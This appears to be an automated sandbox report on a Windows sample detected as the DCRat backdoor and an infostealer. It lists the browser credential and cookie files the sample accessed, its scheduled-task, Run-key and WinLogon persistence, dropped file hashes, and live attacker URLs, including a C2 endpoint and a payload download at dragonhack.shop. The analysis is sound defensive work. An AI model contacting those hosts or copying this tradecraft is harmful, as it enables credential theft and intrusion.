                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                Source: Yara matchFile source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Wh2c6sgwRo.exe PID: 7520, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara matchFile source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d3yngi1q.wji.exe PID: 7768, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\fontdrvhost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, type: DROPPED
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 154 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 1 Obfuscated Files or Information | Security Account Manager | 661 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 271 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 File Deletion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Masquerading | Proc Filesystem | 11 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 271 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
[Behavior graph: ID 1572157, Sample: Wh2c6sgwRo.exe, Start date: 10/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Wh2c6sgwRo.exe | 63% | ReversingLabs | ByteCode-MSIL.Infostealer.Tinba | |
| Wh2c6sgwRo.exe | 78% | Virustotal | | Browse |
| Wh2c6sgwRo.exe | 100% | Avira | TR/Dropper.Gen | |
| Wh2c6sgwRo.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\ProgramData\fontdrvhost.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat | 100% | Avira | BAT/Delbat.C | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Avira | HEUR/AGEN.1309961 | |
| C:\ProgramData\fontdrvhost.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Joe Sandbox ML | | |
| C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
| C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
| C:\ProgramData\fontdrvhost.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
| C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
| C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
| C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | 75% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
                                No Antivirus matches
                                No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0 | 0% | Avira URL Cloud | safe | |
| http://dragonhack.shop | 0% | Avira URL Cloud | safe | |
| https://dragonhack.shop/done.exe | 0% | Avira URL Cloud | safe | |
| https://ion=v4.5V | 0% | Avira URL Cloud | safe | |
| http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php | 0% | Avira URL Cloud | safe | |
| http://crl.mic | 0% | Avira URL Cloud | safe | |
| https://dragonhack.shop | 0% | Avira URL Cloud | safe | |
| http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe | |
| http://crl.micNb | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ip-api.com | 208.95.112.1 | true | false | | high |
| dragonhack.shop | 91.149.219.45 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php | true | Avira URL Cloud: safe | unknown |
| https://dragonhack.shop/done.exe | false | Avira URL Cloud: safe | unknown |
| http://ip-api.com/json/ | false | | high |
| http://ip-api.com/line/?fields=hosting | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false |
| 147.45.44.151 | unknown | Russian Federation | | 2895 | FREE-NET-ASFREEnetEU | false |
| 91.149.219.45 | dragonhack.shop | Poland | | 198401 | GECKONET-ASPL | false |
| 147.45.47.151 | unknown | Russian Federation | | 2895 | FREE-NET-ASFREEnetEU | true |
                                                                                          IP
                                                                                          127.0.0.1
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1572157
                                                                                          Start date and time:2024-12-10 07:26:42 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 11m 0s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:57
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Wh2c6sgwRo.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:43d30c776f593efdf5416ab4142442d6.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@54/78@4/5
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 8.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 56%
                                                                                          • Number of executed functions: 382
                                                                                          • Number of non-executed functions: 13
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 2292 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 3344 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 4100 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 6708 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 8052 because it is empty
                                                                                          • Execution Graph export aborted for target Wh2c6sgwRo.exe, PID 7520 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 2352 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 2616 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 3116 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 7976 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8068 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          Time | Type | Description
                                                                                          01:27:40 | API Interceptor | 78x Sleep call for process: Wh2c6sgwRo.exe modified
                                                                                          01:27:58 | API Interceptor | 1x Sleep call for process: d3yngi1q.wji.exe modified
                                                                                          01:28:00 | API Interceptor | 160x Sleep call for process: powershell.exe modified
                                                                                          01:28:11 | API Interceptor | 662064x Sleep call for process: BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe modified
                                                                                          01:28:14 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                                          07:27:56 | Task Scheduler | Run new task: BQrPGmkzolSuiSkMAkyslxsiiFSSM path: "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:27:57 | Task Scheduler | Run new task: BQrPGmkzolSuiSkMAkyslxsiiFSSMB path: "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:27:57 | Task Scheduler | Run new task: fontdrvhost path: "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:27:57 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:27:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:34 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:42 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:59 | Autostart | Run: WinLogon Shell "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:29:07 | Autostart | Run: WinLogon Shell "C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:15 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:24 | Autostart | Run: WinLogon Shell "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:32 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          No context
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (961), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):961
                                                                                          Entropy (8bit):5.915739367222977
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:mnQ1mkKHA1omCjY4jwqAOYl0vgZ84JgcMSuqTWYZ3U3qa/uqlb:mnQ918Y4cHOQYgBJipqiR3Bvb
                                                                                          MD5:7DEDF1EAA93111A2DDF507545CCA014D
                                                                                          SHA1:1A36F321AD1A9A34A6CA8C61424D43E4E5BBE7F8
                                                                                          SHA-256:F47183EADFD5622D07CE7DFF01C573D8DDAD97694B801117F3A31BF8696552C1
                                                                                          SHA-512:FFF96AE0E904F4F851B49323E2A534AAC84C566CF08AA992EECB85F91CFF1A7523E2249B3334647574D686FDAC801EA82F4848F4A2CDFB9F57805F8F6BB738CB
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:MSVC .res
                                                                                          Category:dropped
                                                                                          Size (bytes):1168
                                                                                          Entropy (8bit):4.448520842480604
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                          Malicious:false
                                                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4608
                                                                                          Entropy (8bit):3.88895111870669
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:6jmRtWxZ8RxeOAkFJOcV4MKe28dFlvqBHruulB+hnqXSfbNtm:jhxvxVx9llvkdTkZzNt
                                                                                          MD5:A7D6105F158F298518569CB67FF203F9
                                                                                          SHA1:CF2605799EFCB7F1833493115DE53A9E006B3E37
                                                                                          SHA-256:550DC71DA420FD390BC772F9B6A375405408F6EFE58D37A2C4DC653E33BF98FB
                                                                                          SHA-512:77C329F532B39A60861144F472DCD582541A5AC54B63743C2C363F3A42A69D61C4CC873CCDEC908B523D4A1F7D99E84DD625487430A347309E84A3BD6C8FDA98
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):243
                                                                                          Entropy (8bit):5.763960449766053
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:8mDGpb91pnClUTqvedQVNjboGN96SAp1SLF0:3D4h18vR//kSApoO
                                                                                          MD5:AEDEBC109AEF66AD239E1D5AF0AD2BDA
                                                                                          SHA1:1EE67C38318EE810D05AA7DCEA93A1155BB7D7EA
                                                                                          SHA-256:1CEC9FC1275790323E3F0735F610D7DC3BD6DCBF4853578B76198E3E0E74A601
                                                                                          SHA-512:D66F1EC94D310671D912ED82939F8C81B4655F05E961D33282DC68E5EABD92E6921F34ABCE94485347BAC08A7E140F1124B36566E56AF94567CE2867C6FA7A45
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):667
                                                                                          Entropy (8bit):5.900263981266306
                                                                                          Encrypted:false
